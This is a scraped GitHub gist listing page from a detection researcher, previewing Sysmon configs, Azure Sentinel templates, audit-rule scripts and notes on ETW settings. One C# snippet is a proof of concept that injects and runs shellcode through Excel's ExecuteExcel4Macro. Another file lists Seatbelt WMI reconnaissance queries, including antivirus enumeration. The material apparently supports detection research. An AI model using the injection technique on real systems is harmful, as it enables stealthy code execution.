- The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
- CLRConfig will look for configurations in the following places in the following order:
- Look at environment variables (prepending COMPlus_ to the name)
- Look at the framework registry keys (
HKCU\Software\Microsoft\.NETFramework - Look at the framework registry keys
HKLM\Software\Microsoft\.NETFramework)
- These can be set in the following ways:
- Setting the environment variable COMPlus_:
- Windows
Roberto Rodriguez Cyb3rWard0g
🍻
Cyb3rWard0g
/ COMPlus_ETWEnabled_detection_notes.md
Last active
November 23, 2023 20:05
Cyb3rWard0g
/ poc_blog_code_section.cs
Created
September 19, 2020 23:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" })); | |
| var startaddr = memaddr; | |
| foreach (var b in shellcode) { | |
| var cb = String.Format("CHAR({0})", b); | |
| var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)"; | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode }); | |
| memaddr++; | |
| } | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" }); |
Cyb3rWard0g
/ StartLogging.xml
Last active
July 6, 2022 23:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Sysmon schemaversion="4.32"> | |
| <!-- Capture all hashes --> | |
| <HashAlgorithms>*</HashAlgorithms> | |
| <DnsLookup>False</DnsLookup> | |
| <ArchiveDirectory>Archive</ArchiveDirectory> | |
| <EventFiltering> | |
| <RuleGroup name="" groupRelation="or"> | |
| <!-- Event ID 1 == Process Creation. Log all newly created processes except --> | |
| <ProcessCreate onmatch="exclude"> | |
| <Image condition="contains">splunk</Image> |
Cyb3rWard0g
/ calculator.xml
Last active
February 7, 2022 14:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> | |
| - <System> | |
| <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> | |
| <EventID>1</EventID> | |
| <Version>5</Version> | |
| <Level>4</Level> | |
| <Task>1</Task> | |
| <Opcode>0</Opcode> | |
| <Keywords>0x8000000000000000</Keywords> | |
| <TimeCreated SystemTime="2018-07-06T12:55:22.864710300Z" /> |
Cyb3rWard0g
/ talk-stream-time.md
Created
May 13, 2020 18:16
Cyb3rWard0g
/ ala-workspace.json
Last active
November 16, 2021 17:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", | |
| "contentVersion": "1.0.0.0", | |
| "parameters": { | |
| "utcValue": { | |
| "type": "string", | |
| "defaultValue": "[utcNow()]", | |
| "metadata": { | |
| "description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" | |
| } |
Cyb3rWard0g
/ ala-workspace-sentinel.json
Last active
October 1, 2021 20:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", | |
| "contentVersion": "1.0.0.0", | |
| "parameters": { | |
| "utcValue": { | |
| "type": "string", | |
| "defaultValue": "[utcNow()]", | |
| "metadata": { | |
| "description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" | |
| } |
Cyb3rWard0g
/ erebor-SilkServiceConfig.xml
Created
October 3, 2019 05:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| SilkService Config | |
| Author: Roberto Rodriguez (@Cyb3rWard0g) | |
| License: GPL-3.0 | |
| Version: 0.0.1 | |
| References: https://github.com/Cyb3rWard0g/mordor/blob/master/environments/windows/configs/erebor/erebor_SilkServiceConfig.xml | |
| --> | |
| <SilkServiceConfig> | |
| <!-- |
Cyb3rWard0g
/ seatbelt_wmi_query_strings_basic_exploration.txt
Created
May 27, 2020 15:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')" | |
| SELECT * FROM win32_networkconnection" | |
| Select * from Win32_ComputerSystem" | |
| SELECT * FROM Win32_DeviceGuard" | |
| SELECT * FROM win32_service" | |
| SELECT * FROM AntiVirusProduct" | |
| SELECT * FROM MSFT_DNSClientCache" | |
| SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process" | |
| SELECT * FROM Win32_Process" | |
| SELECT * FROM Win32_Process WHERE SessionID != 0" |
Cyb3rWard0g
/ syskey_registry_keys_sacl_setup.ps1
Created
November 20, 2020 09:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download https://github.com/OTRF/Set-AuditRule/blob/master/Set-AuditRule.ps1 | |
| Import-Module .\Set-AuditRule.ps1 | |
| $AuditRules = @" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "@ |
NewerOlder